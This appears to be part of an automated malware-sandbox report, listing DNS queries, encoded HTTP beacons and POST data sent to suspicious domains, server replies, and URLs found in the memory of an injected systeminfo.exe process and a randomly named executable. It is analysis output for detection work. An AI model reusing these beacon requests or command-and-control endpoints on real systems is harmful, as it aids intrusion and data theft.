Source: global traffic	HTTP traffic detected: GET /nhb9/?ERYLmh=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiDPCXANULjdgkxwmOOUHyZqikvDogiQcXSnY=&X6H8=IvQt7 HTTP/1.1Host: www.valuault.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)
Source: global traffic	HTTP traffic detected: GET /2x3i/?ERYLmh=ozNw7NS3nEOk5LjjCOldIIGkyQfls/9HGmRhrjNi7rrUwaxJWNlgSsqd820yKv/9if09QmpvaDID9eWOlIIxCNIrEjeF8HSt0uqtuoAuwQX7Per/XEdcwbY=&X6H8=IvQt7 HTTP/1.1Host: www.qqssii.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)

Source: global traffic	DNS traffic detected: DNS query: www.potorooqr.lol
Source: global traffic	DNS traffic detected: DNS query: www.dffmdogmyftftv2e.cyou
Source: global traffic	DNS traffic detected: DNS query: www.vipstargold.buzz
Source: global traffic	DNS traffic detected: DNS query: www.hwak.live
Source: global traffic	DNS traffic detected: DNS query: www.gern.dev
Source: global traffic	DNS traffic detected: DNS query: www.sql.dance
Source: global traffic	DNS traffic detected: DNS query: www.lmueller.dev
Source: global traffic	DNS traffic detected: DNS query: www.newbh.pro
Source: global traffic	DNS traffic detected: DNS query: www.omp037621r.vip
Source: global traffic	DNS traffic detected: DNS query: www.valuault.store
Source: global traffic	DNS traffic detected: DNS query: www.qqssii.top
Source: global traffic	DNS traffic detected: DNS query: www.arabhost.shop
Source: global traffic	DNS traffic detected: DNS query: www.dodowo.shop

Source: unknown

HTTP traffic detected: POST /i0t0/ HTTP/1.1Host: www.gern.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 203Cache-Control: max-age=0Connection: closeOrigin: http://www.gern.devReferer: http://www.gern.dev/i0t0/User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)Data Raw: 45 52 59 4c 6d 68 3d 30 37 68 67 4a 6c 37 69 43 42 56 49 69 34 6e 66 4c 45 7a 41 2b 31 34 57 67 71 31 47 62 61 4f 44 4a 71 37 41 72 32 49 54 78 31 6f 78 6b 6d 61 51 6c 48 70 63 46 69 7a 70 35 76 36 59 75 56 44 4b 37 53 6f 58 4d 38 33 79 50 67 64 49 79 41 43 57 77 46 31 6b 47 71 7a 37 67 58 6b 62 53 6e 45 41 6a 54 71 37 4b 46 45 54 32 56 68 56 61 62 4b 46 53 56 49 31 37 66 56 77 34 71 57 38 56 7a 4a 37 66 32 53 5a 32 55 2b 4d 31 2b 38 52 44 6a 34 4c 50 65 58 57 72 6a 51 30 44 63 77 6a 6f 4f 6d 31 4f 6b 75 67 66 44 6a 48 6b 2b 49 69 30 50 62 46 63 38 62 31 2f 6e 71 4c 54 59 46 6d 6b 59 49 4c 47 41 3d 3d Data Ascii: ERYLmh=07hgJl7iCBVIi4nfLEzA+14Wgq1GbaODJq7Ar2ITx1oxkmaQlHpcFizp5v6YuVDK7SoXM83yPgdIyACWwF1kGqz7gXkbSnEAjTq7KFET2VhVabKFSVI17fVw4qW8VzJ7f2SZ2U+M1+8RDj4LPeXWrjQ0DcwjoOm1OkugfDjHk+Ii0PbFc8b1/nqLTYFmkYILGA==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:50:26 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:50:29 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:50:29 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:50:29 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:50:31 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:50:34 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:53:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:53:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:53:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 18:53:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Fri, 10 Jan 2025 18:54:02 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Fri, 10 Jan 2025 18:54:04 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Fri, 10 Jan 2025 18:54:07 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Fri, 10 Jan 2025 18:54:09 GMTConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0

Source: UNUqLBRwwpkr.exe, 00000009.00000002.3433411513.00000000058A0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.qqssii.top
Source: UNUqLBRwwpkr.exe, 00000009.00000002.3433411513.00000000058A0000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.qqssii.top/2x3i/
Source: systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: systeminfo.exe, 00000006.00000002.3432253939.0000000005436000.00000004.10000000.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000002.3431974679.0000000003986000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2193231609.0000000014576000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://error.skycloud.tw/system/error?code=400
Source: systeminfo.exe, 00000006.00000002.3430481412.0000000000935000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: systeminfo.exe, 00000006.00000002.3430481412.0000000000935000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: systeminfo.exe, 00000006.00000003.2081863462.000000000789D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: systeminfo.exe, 00000006.00000002.3430481412.0000000000935000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: systeminfo.exe, 00000006.00000002.3430481412.000000000094F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: systeminfo.exe, 00000006.00000002.3430481412.000000000094F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033H
Source: systeminfo.exe, 00000006.00000002.3430481412.000000000094F000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3430481412.0000000000935000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: systeminfo.exe, 00000006.00000002.3430481412.0000000000935000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: systeminfo.exe, 00000006.00000002.3433664860.0000000007610000.00000004.00000800.00020000.00000000.sdmp, systeminfo.exe, 00000006.00000002.3432253939.0000000005A7E000.00000004.10000000.00040000.00000000.sdmp, UNUqLBRwwpkr.exe, 00000009.00000002.3431974679.0000000003FCE000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: systeminfo.exe, 00000006.00000003.2087419268.00000000078BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
